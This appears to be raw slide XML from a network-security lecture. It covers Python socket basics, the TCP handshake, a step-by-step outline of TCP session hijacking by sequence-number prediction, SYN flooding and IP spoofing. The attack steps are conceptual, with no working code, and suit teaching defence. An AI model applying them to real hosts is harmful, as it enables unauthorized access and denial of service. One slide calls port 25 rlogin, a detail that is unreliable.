              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{42683BF9-4C0A-8F67-AB2D-38DB4FB3F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1504" y="2632510"/>
            <a:ext cx="842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LISTEN</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="38" name="Group 118">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{553953D3-B515-439C-3A58-855BC5EB052C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="4464473" y="2492809"/>
            <a:ext cx="642937" cy="600075"/>
            <a:chOff x="-44" y="1473"/>
            <a:chExt cx="981" cy="1105"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="39" name="Picture 119" descr="desktop_computer_stylized_medium">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7DFED94E-B9D8-74C6-E524-D83691619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Freeform 120">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9718F39C-B36E-4BB5-9F66-82156F1205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" name="Group 121">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A1AF3573-48E7-C95C-FBFC-30FA5C9F97AE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="7221809" y="2580121"/>
            <a:ext cx="336550" cy="512763"/>
            <a:chOff x="4140" y="429"/>
            <a:chExt cx="1425" cy="2396"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="42" name="Freeform 122">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C40F16B3-4393-FF45-615D-A19698F5A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Rectangle 123">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A772929A-5F45-8D16-44B5-ECA99DECB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" name="Freeform 124">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{27224AC3-AF95-ED8A-859C-E961417BB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Freeform 125">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2A9FAE08-DC9E-C8D5-765E-B47E1DF6E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Rectangle 126">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B6758528-D6FE-6E55-FCC5-27F31AA3E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7" name="Group 127">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4E9920A8-7E0C-633B-862D-4E6D7989EA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" name="AutoShape 128">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{31F8E308-4C55-E489-4A15-78A7E2E4B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" name="AutoShape 129">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A621ED49-113D-52B7-262F-C50F12C71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8" name="Rectangle 130">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{24CA09C9-2BA9-2DA0-0E19-C8723DFCD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9" name="Group 131">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2BBEC762-B229-0626-FAF7-76E8ACE093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0" name="AutoShape 132">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A02555F0-A098-A1A0-F3EB-DC813DA86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1" name="AutoShape 133">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D1095B88-EB50-1C8B-0CF5-5C568FC04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0" name="Rectangle 134">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2E4DF362-86CF-FA17-10A7-619AA18BD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1" name="Rectangle 135">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0650C847-CA09-3387-59FB-50711A26B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2" name="Group 136">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0232600B-BF46-A438-8E6C-A8A207DDE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" name="AutoShape 137">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AF8C2312-405F-8547-1603-0566FB3F8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9" name="AutoShape 138">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F3105DDD-954A-7D5E-70DA-DBAA5602E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3" name="Freeform 139">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6A2AD44F-334B-476B-E556-5E3973F9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4" name="Group 140">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D17F0589-E649-5D83-C7DA-9756A80EF9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6" name="AutoShape 141">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A715823A-5DD3-B675-15D1-D435CC4E1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" name="AutoShape 142">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2B364659-A3D5-F341-B38B-DB82747FC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5" name="Rectangle 143">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{10CF8DAE-F496-DBFA-D894-915B98FE7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Freeform 144">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D82B907A-4C14-DD9C-B9B5-1F6F583C1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Freeform 145">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F076E6B3-F6D8-E751-40C6-98ED2DDEC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146">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2E0FC9E3-7F69-B98B-248D-8473DBD12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" name="Freeform 147">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AC51E4A2-296C-2531-9716-1A9625D12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AutoShape 148">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4F1F3B10-EDEA-CAD0-542D-B057187C6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" name="AutoShape 149">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7382535D-675E-D89B-CD25-67A28DE78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" name="Oval 150">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2D99FF9C-D773-5BAA-4F54-FBAD33A8E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Oval 151">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{770A6FCE-160D-3639-B9E5-947384954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Oval 152">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1DF6816B-10E8-A7AB-65CD-949EBCB9C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5" name="Rectangle 153">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1BECE363-7EDC-738B-75A0-031590CC4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4" name="Text Box 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D5AC4A46-1732-CB03-B2A1-89B91E17C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62" y="2181018"/>
            <a:ext cx="4209864" cy="26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clientSocket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 = socket(AF_INET, SOCK_STREAM)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="75" name="Text Box 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CD6B91B5-DCBC-81A0-2B4D-91D1AD0FD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1898" y="1651172"/>
            <a:ext cx="4461478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serverSocket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 = socket(AF_INET,SOCK_STREAM)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serverSocket.bind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((‘’,</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US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serverPort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serverSocket.listen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connectionSocket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, </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US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addr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 = </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US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serverSocket.accept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" name="Text Box 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{662C88A4-E841-C7C2-325B-479816D74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43" y="2694832"/>
            <a:ext cx="4433244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clientSocket.connect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((</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" alt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serverName,serverPort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818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2E6543-B14D-388B-746B-E181D520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Session Hijacking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F713F-D440-055B-CB38-12838BF61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02173E-A9A1-9235-A844-449CD27A157A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="838201" y="1751102"/>
            <a:ext cx="6380676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400">
                <a:solidFill>
                  <a:srgbClr val="990000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Tahoma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>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma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  <a:latin typeface="Tahoma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itchFamily="2" charset="2"/>
              <a:buChar char="q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itchFamily="2" charset="2"/>
              <a:buChar char="q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itchFamily="2" charset="2"/>
              <a:buChar char="q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itchFamily="2" charset="2"/>
              <a:buChar char="q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sz="2800"/>
              <a:t>TCP connection has both sequence number and acknowledge number in each packet.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800"/>
              <a:t>The two ends negotiate what seq. and ack. numbers to be used in TCP set up stage.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800"/>
              <a:t>seq and ack number size: 2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800" baseline="30000"/>
              <a:t>32</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400"/>
              <a:t>Makes seq/ack guessing very hard to achieve</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400"/>
              <a:t>Very hard to hijack an already setup TCP connection!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4B4803A9-71BF-C011-0668-23A91C96B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4951" y="2627402"/>
            <a:ext cx="2533650" cy="590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A4E92-1A4D-6F2A-234E-C98682C7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201" y="1959065"/>
            <a:ext cx="485775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2AA31F55-3B85-2239-035D-88D90B3D9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0038" y="1959065"/>
            <a:ext cx="714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r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1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client</a:t>
            </a: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B92980B1-CC39-601D-A7BD-22210C60CBC1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="706751">
            <a:off x="8090413" y="2648040"/>
            <a:ext cx="1371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SYN, </a:t>
            </a:r>
          </a:p>
          <a:p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seq=client_seq</a:t>
            </a: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C2CD3-3194-6456-0EC6-58EEBC350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676" y="1968590"/>
            <a:ext cx="485775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856D683B-21F8-85B1-A228-BD217E9D6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0063" y="1978115"/>
            <a:ext cx="800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r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1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server</a:t>
            </a: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374BD43B-0DC9-0F05-5883-8964BE394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4476" y="4364127"/>
            <a:ext cx="2533650" cy="590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67BBC905-560A-881E-25D4-A65C02119C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98601" y="2398802"/>
            <a:ext cx="0" cy="3409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76E514E5-7DBB-2935-1CB2-1FAE410CB3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6376" y="3360827"/>
            <a:ext cx="2495550" cy="7524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E6B90FBE-C4ED-E7AA-0304-AA4B088FDF0D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="20673133">
            <a:off x="7471288" y="3448140"/>
            <a:ext cx="27320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SYN/ACK, </a:t>
            </a:r>
          </a:p>
          <a:p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seq=server_seq, ack=client_seq+1</a:t>
            </a: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08D62DF7-7005-578E-BEFF-680DA4219007}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="706751">
            <a:off x="8069776" y="4429215"/>
            <a:ext cx="16414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ACK, </a:t>
            </a:r>
          </a:p>
          <a:p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seq=client_seq+1</a:t>
            </a:r>
          </a:p>
          <a:p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ack=server_seq+1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Line 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EA00F69B-39AE-6A63-538D-A24FF60C7B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5426" y="2551202"/>
            <a:ext cx="0" cy="3343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F59D3A-F330-0749-CDBA-A9BC3FCBB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358" y="1724027"/>
            <a:ext cx="4393442" cy="4351338"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="644525" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>X-&gt;Z, port 25 (rlogin), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>SeqX</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr marL="644525" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Z-&gt;X, Ack: SeqX+1,SeqZ</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="644525" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>C-&gt;Z (attacker masquerades as C), port 513, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>SeqX</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>’</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="644525" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Z-&gt;C, Ack, SeqX’+1,SeqZ’</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>now attacker can calculate </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>SeqZ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>’ (if badly configured) from knowledge of Z</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="644525" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>C-&gt; Z (masked), Ack: SeqZ’+1, now server thinks rlogin established </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="130175" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr marL="644525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B954EA-599E-CAA2-E7BF-49533478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TCP Session Hijacking a bit more concrete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560A5-61F5-7969-B2D9-386D95876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39F2F-7951-DF23-FE37-5125BFF7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83" y="2575285"/>
            <a:ext cx="6401693" cy="2267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A1168F-2EFA-F7F3-A4EC-2720139A394E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="533783" y="5331125"/>
            <a:ext cx="5884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Attacker needs to flood C because otherwise it may send reset packets if it gets answers (outside of a connection) from Z</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="340966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B290C-D5AA-4496-4C09-AB518B48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 Flooding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1489E-B676-40C1-0DC7-24C2F39B9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749BF4-F88A-3545-DFA9-E68CA0A0EA19}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1762918" y="1249363"/>
            <a:ext cx="6611938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400">
                <a:solidFill>
                  <a:srgbClr val="990000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Tahoma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>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma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  <a:latin typeface="Tahoma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1600">
                <a:solidFill>
                  <a:srgbClr val="000000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itchFamily="2" charset="2"/>
              <a:buChar char="q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itchFamily="2" charset="2"/>
              <a:buChar char="q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itchFamily="2" charset="2"/>
              <a:buChar char="q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itchFamily="2" charset="2"/>
              <a:buChar char="q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/>
              <a:t>An attacker sends a large number of SYN requests to a target's system</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>Target uses too much memory and CPU resources to process these fake connection requests</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>Target’s bandwidth is overwhelmed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>Usually SYN flood packets use spoofed source IPs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>No TCP connection is set up (not like the TCP hijacking!)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>Hide attacking source</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>Make the target very hard to decide which TCP SYN is attack and which TCP SYN is from legitimate users!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E49C6-C60D-6D5E-E57D-DBBFDAC65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31" y="2232026"/>
            <a:ext cx="20955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EBD3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691E2611-6DF6-391F-88A6-7C1A97E42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9268" y="5011738"/>
            <a:ext cx="2309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r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600"/>
              <a:t>Image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410996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B0BBB-C1B4-605D-F936-206619F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04043-F8A3-40A0-AD75-064CA998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1C704-55A3-B131-D212-671103C5ED3B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="908983" y="1250730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Network Vulnerabilities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51A50-AE5E-A16A-5486-FEA3EF1145F8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="908983" y="2312118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Application</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="2400" dirty="0"/>
              <a:t> Layer </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="2400" dirty="0" err="1"/>
              <a:t>Attacks</a:t>
            </a:r>
            <a:endParaRPr lang="en-D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7103-6E6B-AB68-1DC5-F4171CC4AC15}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="908983" y="3373506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Transport Lay</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>er Attacks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58FBA-15E7-E9DB-DFF8-C5130938CDEB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="908982" y="4434894"/>
            <a:ext cx="10925665" cy="7987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Network Layer Attacks</a:t>
            </a:r>
            <a:endParaRPr lang="en-DE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4147A-06D5-2161-B675-FC11C82D98D3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="908981" y="549628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Link Layer Attacks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18410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D46786-216F-3279-6A74-156A1E2B0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Technique to gain unauthorized access to machines</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Involves creation of IP packets with modified source address</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Also called IP address forgery or host file hijack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="130175" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr marL="644525" indent="-514350">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Attacker identifies IP address of trusted host, e.g. via </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>shodan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://www.techtarget.com/whatis/definition/Shodan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="644525" indent="-514350">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Modifies headers of packets being sent</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="987425" lvl="1" indent="-514350">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Involves changing IP address, checksum, order value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 attacker injects own packets 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 trust within subnet is being exploited</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr marL="644525" indent="-514350">
              <a:buAutoNum type="arabicPeriod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BF08DB-BE69-F09C-AF1A-A3290607D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Spoofing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86B61-E230-C109-CEA2-5894EF603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B112B-01CE-24B0-5D11-E97461AB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Spoofed IP traffic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DC764-49B3-29F2-B800-D778A389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62" y="1675227"/>
            <a:ext cx="8744676" cy="4394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EB694-D3AB-9637-FB36-D7D6D69C9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Security: 8- </a:t>
            </a:r>
            <a:fld id="{C4204591-24BD-A542-B9D5-F8D8A88D2FEE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1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9E5025-4B73-3037-6216-2132DCD91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IP spoofing can further cause various attacks, e.g.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Blind spoofing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Non-blind spoofing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>DoS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Man in the middle attack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64830C-A65A-E7CB-E0D2-269163A1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Exploits of IP spoofing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FF282-0EF0-7724-7ED4-CCAFBA185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79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1CE16D-3A58-20B0-D039-5648F9EFEAC7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3820939" y="2354073"/>
            <a:ext cx="1848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4C538C-19DE-7BCE-36A3-72019EC16A5D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6194891" y="2130725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Attacker not in same subnet as target </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> needs to “break” into the trust relationship  TCP session hijacking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8F30-AEBB-2A82-24D7-B1D0B5C2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MITRE Attack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17F11-1995-6FAA-8618-3DAB61C90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37" y="1845426"/>
